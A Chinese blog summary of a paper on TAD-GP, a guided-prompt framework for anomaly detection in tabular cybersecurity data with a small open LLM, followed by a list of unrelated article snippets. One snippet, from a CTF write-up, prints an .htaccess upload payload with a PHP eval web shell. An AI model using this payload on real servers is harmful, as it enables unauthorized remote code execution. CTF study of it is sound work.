使用大语言模型在表格化网络安全数据中进行高效异常检测

论文链接

Efficient anomaly detection in tabular cybersecurity data using large language models

论文主要内容

这篇论文介绍了一种基于大型语言模型(LLMs)的创新方法,用于表格网络安全数据中的异常检测,称为“基于引导式提示的表格异常检测”(Tabular Anomaly Detection via Guided Prompts,简称TAD-GP)。该方法利用了一个70亿参数的开源模型,并结合了数据样本介绍、异常类型识别、链式思考推理、虚拟多轮对话和关键信息强化等策略。实验结果表明,TAD-GP框架在CICIDS2017、KDD Cup 1999和UNSW-NB15数据集上的F1分数分别提高了79.31%、97.96%和59.09%。此外,较小规模的TAD-GP模型在多个数据集上的表现优于较大的模型,显示出其在计算资源受限和需要私有部署的环境中的实际潜力。该方法填补了使用小型开源模型进行网络安全异常检测的研究空白。

背景知识

在网络安全领域,表格数据用于捕获关键信息,如网络流量、用户行为和系统日志。随着网络攻击变得越来越复杂,传统的基于规则的检测方法已不足以应对。因此,研究人员转向使用机器学习和深度学习等先进的异常检测技术,尽管这些方法在一定程度上取得了成功,但仍面临泛化能力的挑战。

研究方法

TAD-GP框架通过以下五个关键策略来提高小型语言模型在表格数据异常检测中的性能:

数据样本介绍(Data Sample Introduction)

目的:帮助模型快速熟悉关键数据特征和模式。
方法:随机选择一个正常样本和一个异常样本,将这些样本转换为JSON格式,便于模型处理和理解数据的结构和属性。
效果:增强模型对关键模式的早期识别能力,从而实现更快、更准确的异常检测。

细粒度异常分类(Fine-grained Anomaly Classification)

目的:指导模型识别各种异常行为,提高分类精度。
方法:为每个数据集建立清晰的异常类别序列,如KDD Cup 1999数据集中的拒绝服务(DOS)、远程到本地(R2L)、本地到超级用户(U2R)和探测(PROBING)等类别。
效果:减少不同异常类型之间的混淆风险,提高检测准确性和鲁棒性。

链式思考策略(Chain-of-Thought Strategy)

目的:提高模型对复杂数据特征的理解和推理能力。
方法:采用“先部分,后整体”的策略,模型先独立分析每个特征,然后综合多个特征之间的交互来识别潜在的异常模式。
效果:增强模型对数据特征之间复杂关系的理解,使模型能够检测到不仅显式的异常,还能检测到更微妙的异常模式组合。在高维和复杂数据场景中,该策略允许模型更详细地分析特征依赖关系,从而做出更全面和准确的判断。

虚拟多轮对话技术(Virtual Multi-turn Dialogue Technology)

目的:模拟专家在复杂推理任务中的思维过程,逐步加深对异常模式的理解,同时加快模型的推理速度。
方法:设计多轮对话场景,每轮对话包括用户提问和助手回答。通过多轮互动,模型逐步获取关键信息,从数据示例到特征分析,逐步深化对异常模式的理解。在传统的与大语言模型的对话方式中,用户提问是我们的输入,助手回答是模型经过推理后的输出。例如:对于一个5轮的交互式对话,模型需要进行5次推理输出。而在虚拟多轮对话技术中,除了最后1次的助手回答为模型推理后的输出,其余的4次用户提问与助手回答都是人为设计的,这将原本需要的5次推理输出变为了1次,有效地缩短了模型推理时间。而由于前4次的助手回答都是人为设计的,我们可以在助手回答中放入更多我们所期望的信息,来更好地引导模型的推理过程。这也是我们将整个框架命名为TAD-GP,即基于引导式提示的表格异常检测的主要原因。
效果:减轻模型在单实例分析中的认知负担,通过结构化引导方法促进更精确的推理和判断。与真实对话不同,虚拟对话通过人工设计的助手回答来引导模型进行深入思考,确保其分析过程符合预定义的期望,同时加快模型的推理速度。

关键信息记忆强化(Key Information Memory Reinforcement)

目的:确保模型在多轮对话过程中始终保留关键数据点,防止模型忽略重要元素。
方法:在多轮对话中,通过一致强调重要细节来强化关键信息。例如,在第一轮对话中,模型被提示获取一个正常数据样本,而在第二轮对话中,进一步强调该数据的正常性。
效果:通过反复强调关键特征,模型可以加强对其关键异常模式的记忆,从而提高整体检测精度。在涉及复杂特征关系的场景中,该机制有助于模型保留关键信息,增强其在挑战性数据环境中的可靠性。

实验设计

实验旨在评估大型语言模型在表格数据异常检测中的潜力,并通过引入创新的TAD-GP框架来验证其在小型模型中的有效性。实验设计包括多个方面:
模型和数据集选择:选择了Gemma-7b-it模型作为基础模型,并选择了KDD Cup 1999、CICIDS2017和UNSW-NB15三个广泛使用的基准数据集。
数据预处理:包括数据清洗、数据平衡和数据格式转换,以确保数据的完整性和一致性。
评估指标:使用准确率、精确率、召回率和F1分数来全面评估模型在不同实验条件下的性能。

实验结果与讨论

实验结果表明,TAD-GP框架通过引导提示策略显著提高了小型模型在异常检测任务中的性能。具体来说:
链式思考策略:在KDD Cup 1999数据集上,使用5步链式思考和多轮对话将准确率从0.50提高到0.98,F1分数达到0.9796。
多轮对话策略:在CICIDS2017数据集上,多轮对话将F1分数从0.6047提高到0.7931,强调了连续上下文增强对于理解复杂模式的重要性。
小型模型与大型模型的比较:TAD-GP框架使小型Gemma-7b-it模型在多个性能指标上优于大型模型,如GPT-3.5-turbo、Llama-2-70b-chat和Mixtral-8x7B-Instruct。Gemma-7b-it模型的F1分数为0.7879,超过了GPT-3.5-turbo的0.7146和Llama-2-70b-chat的0.7248。

结论

TAD-GP框架提供了一种创新且实用的方法,通过引导提示策略显著提高了小型语言模型在表格网络数据异常检测中的性能。该框架不仅在资源受限的环境中具有优势,还提供了能源效率、灵活部署和隐私保护的支持。未来的研究可以进一步验证该框架的泛化能力,并探索其在金融、医疗保健和供应链管理等领域的潜力。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/69389.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

单片机基础模块学习——PCF8591芯片

一、A/D、D/A模块 A——Analog 模拟信号:连续变化的信号(很多传感器原始输出的信号都为此类信号)D——Digital 数字信号:只有高电平和低电平两种变化(单片机芯片、微控制芯片所能处理的都是数字信号) 下面是模拟信号和连续信号的区别 为什么需要进行模拟信号和数字信号之…

Dismissible组件的用法

文章目录 1 概念介绍2 使用方法3 示例代码我们在上一章回中介绍了GestureDetector Widget相关的内容,本章回中将介绍Dismissible Widget.闲话休提,让我们一起Talk Flutter吧。 1 概念介绍 我们在这里介绍的Dismissible是一个事件响应Widget,它和GestureDetector类似,不过它只…

C++ Lambda 表达式的本质及原理分析

目录 1.引言 2.Lambda 的本质 3.Lambda 的捕获机制的本质 4.捕获方式的实现与底层原理 5.默认捕获的实现原理 6.捕获 this 的机制 7.捕获的限制与注意事项 8.总结 1.引言 C 中的 Lambda 表达式是一种匿名函数,最早在 C11 引入,用于简化函数对象的…

DevEco Studio 4.1中如何创建OpenHarmony的Native C++ (NAPI)程序

目录 引言 操作步骤 结语 引言 OpenHarmony的开发工具变化很快,有的时候你安装以前的教程进行操作时会发现界面和操作方式都变了,进行不下去了。比如要在OpenHarmony中通过NAPI调用C程序,很多博文(如NAPI篇【1】——如何创建含…

[JMCTF 2021]UploadHub

题目 上传.htaccess就是修改配置文件 <FilesMatch .htaccess> SetHandler application/x-httpd-php Require all granted php_flag engine on </FilesMatch>php_value auto_prepend_file .htaccess #<?php eval($_POST[md]);?>SetHandler和ForceType …

算法题(49):反转链表II

审题&#xff1a; 需要我们对指定范围的链表进行反转&#xff0c;并返回反转后链表的头结点 思路&#xff1a; 方法一&#xff1a;vector法 我们先遍历一次链表&#xff0c;并把数据对应的存在数组中&#xff0c;然后利用数组的reverse方法进行反转数据&#xff0c;最后再遍历一…

与机器学习相关的概率论重要概念的介绍和说明

概率论一些重要概念的介绍和说明 1、 试验 &#xff08;1&#xff09;试验是指在特定条件下&#xff0c;对某种方法、技术、设备或产品&#xff08;即&#xff0c;事物&#xff09;进行测试或验证的过程。 &#xff08;2&#xff09;易混淆的概念是&#xff0c;实验。实验&…

八股文 (一)

文章目录 项目地址一、前端1.1 大文件上传,预览1.2 首页性能优化1.2 流量染色,灰度发布1.3 Websock心跳机制,大数据实时数据优化1.4 Gpu 加速 fps优化1.5 echarts包大小优化和组件封装1.6 前端监控系统1.7 超大虚拟列表卡顿1. 实现2. 相关问题(1) 什么是虚拟化列表,为什么要…

DeepSeek R1:中国AI黑马的崛起与挑战

文章目录 技术突破&#xff1a;从零开始的推理能力进化DeepSeek R1-Zero&#xff1a;纯RL训练的“自我觉醒”DeepSeek R1&#xff1a;冷启动与多阶段训练的平衡之道 实验验证&#xff1a;推理能力的全方位跃升基准测试&#xff1a;超越顶尖闭源模型蒸馏技术&#xff1a;小模型的…

算法刷题Day28:BM66 最长公共子串

题目链接&#xff0c;点击跳转 题目描述&#xff1a; 解题思路&#xff1a; 方法一&#xff1a;暴力枚举 遍历str1的每个字符x&#xff0c;并在str2中寻找以相同元素x为起始的最长字符串。记录最长的公共子串及其长度。 代码实现&#xff1a; def LCS(self, str1: str, st…

卡特兰数学习

1&#xff0c;概念 卡特兰数&#xff08;英语&#xff1a;Catalan number&#xff09;&#xff0c;又称卡塔兰数&#xff0c;明安图数。是组合数学中一种常出现于各种计数问题中的数列。它在不同的计数问题中频繁出现。 2&#xff0c;公式 卡特兰数的递推公式为&#xff1a;f(…

Microsoft Visual Studio 2022 主题修改(补充)

Microsoft Visual Studio 2022 透明背景修改这方面已经有很多佬介绍过了&#xff0c;今天闲来无事就补充几点细节。 具体的修改可以参考&#xff1a;Microsoft Visual Studio 2022 透明背景修改&#xff08;快捷方法&#xff09;_material studio怎么把背景弄成透明-CSDN博客文…

Redis 详解

简介 Redis 的全称是 Remote Dictionary Server&#xff0c;它是一个基于内存的 NoSQL&#xff08;非关系型&#xff09;数据库&#xff0c;数据以 键值对 存储&#xff0c;支持各种复杂的数据结构 为什么会出现 Redis&#xff1f; Redis 的出现是为了弥补传统数据库在高性能…

如何运用python爬虫爬取百度贴吧的静态图片?

爬取百度贴吧图片的详细步骤和代码实现 爬取百度贴吧图片的过程可以分为以下几个步骤&#xff1a; 分析网页结构&#xff1a;了解百度贴吧页面的HTML结构&#xff0c;找到图片的URL。发送HTTP请求&#xff1a;使用requests库获取网页内容。解析HTML内容&#xff1a;使用Beaut…

17.Word:李楠-学术期刊❗【29】

目录 题目​ NO1.2.3.4.5 NO6.7.8 NO9.10.11 NO12.13.14.15 NO16 题目 NO1.2.3.4.5 另存为手动/F12Fn光标来到开头位置处→插入→封面→选择花丝→根据样例图片&#xff0c;对应位置填入对应文字 (手动调整即可&#xff09;复制样式&#xff1a;开始→样式对话框→管理…

C# lock使用详解

总目录 前言 在 C# 多线程编程中&#xff0c;lock 关键字是一种非常重要的同步机制&#xff0c;用于确保同一时间只有一个线程可以访问特定的代码块&#xff0c;从而避免多个线程同时操作共享资源时可能出现的数据竞争和不一致问题。以下是关于 lock 关键字的详细使用介绍。 一…

高低频混合组网系统中基于地理位置信息的信道测量算法matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 2.算法运行软件版本 matlab2022a 3.部分核心程序 &#xff08;完整版代码包含详细中文注释和操作步骤视频&#xff09…

ES6 类语法:JavaScript 的现代化面向对象编程

Hi&#xff0c;我是布兰妮甜 &#xff01;ECMAScript 2015&#xff0c;通常被称为 ES6 或 ES2015&#xff0c;是 JavaScript 语言的一次重大更新。它引入了许多新特性&#xff0c;其中最引人注目的就是类&#xff08;class&#xff09;语法。尽管 JavaScript 一直以来都支持基于…

1.1第1章DC/DC变换器的动态建模-1.1状态平均的概念--电力电子系统建模及控制 (徐德鸿)--读书笔记

电力电子系统一般由电力电子变换器&#xff08;滤波电路和开关&#xff09;、PWM 调制器、驱动电路、反馈控制单元构成&#xff0c;如图1-1所示。由控制理论的知识&#xff0c;电力电子系统的静态和动态性能的好坏与反馈控制设计密切相关。要进行反馈控制设计&#xff0c;首先要…

Cursor 帮你写一个小程序

Cursor注册地址 首先下载客户端 点击链接下载 1 打开微信开发者工具创建一个小程序项目 选择TS-基础模版 官方 2 然后使用Cursor打开小程序创建的项目 3 在CHAT聊天框输入自己的需求 比如 小程序功能描述&#xff1a;吃什么助手 项目名称&#xff1a; 吃什么小程序 功能目标…